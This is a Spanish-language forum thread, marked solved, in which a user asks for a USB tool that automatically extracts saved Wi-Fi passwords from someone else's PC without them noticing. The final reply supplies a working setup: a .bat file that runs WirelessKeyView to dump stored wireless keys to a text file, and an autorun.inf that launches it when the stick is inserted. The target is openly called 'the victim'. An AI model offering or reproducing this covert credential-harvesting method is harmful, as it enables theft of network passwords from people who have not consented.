[SOLUCIONADO] Sacar password wifi por medio de un usb

Iniciado por jetlivefree, Septiembre 05, 2011, 09:43:06 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Septiembre 05, 2011, 09:43:06 PM Ultima modificación: Mayo 20, 2014, 07:33:31 AM por blackdrake
Hola quisiera saber si alguien me pueda pasar un software que saque el password wifi de una pc, que al insertarlo saque automáticamente todas las contraseña almacenada, hay uno "usb rater" pero no se si logra sacar el password wifi. gracias por el dato.

El usb ratero, no saca los pass de la WIFI!! xD
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



que yo sepa ese password no queda almacenado en ninguna parte, así que ese método no serviriía.  ;D
¡< blozzter >!

los passwords wifi si quedan almacenados en la compu pero con ese programa no puedes sacarlos bueno eso creo  hay un programa para sacar los paswords guardados o puedes sacarlos manualmente pero si lo que quieres es que la persona no se de cuenta pues abria que buscar como hacerlo con un programa como ese que dices tu

aer para mi teni 2 forma si tu estay encima del pc de la victima una forma de decir podi ver la password en Panel de control\Redes e Internet\Administrar redes inalámbricas si que es windows 7 esta seria una recomendacion

yaaa!! esa es 1 y la del USB podria crearte un usb ratero

Descargai este software No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Despues te asi un .bat

Código: php
start WirelessKeyView.exe /stext WirelessKeyView.txt


despues el "autorun.inf"
Código: php

[autorun]
open=launch.bat


y listoco


Saludos!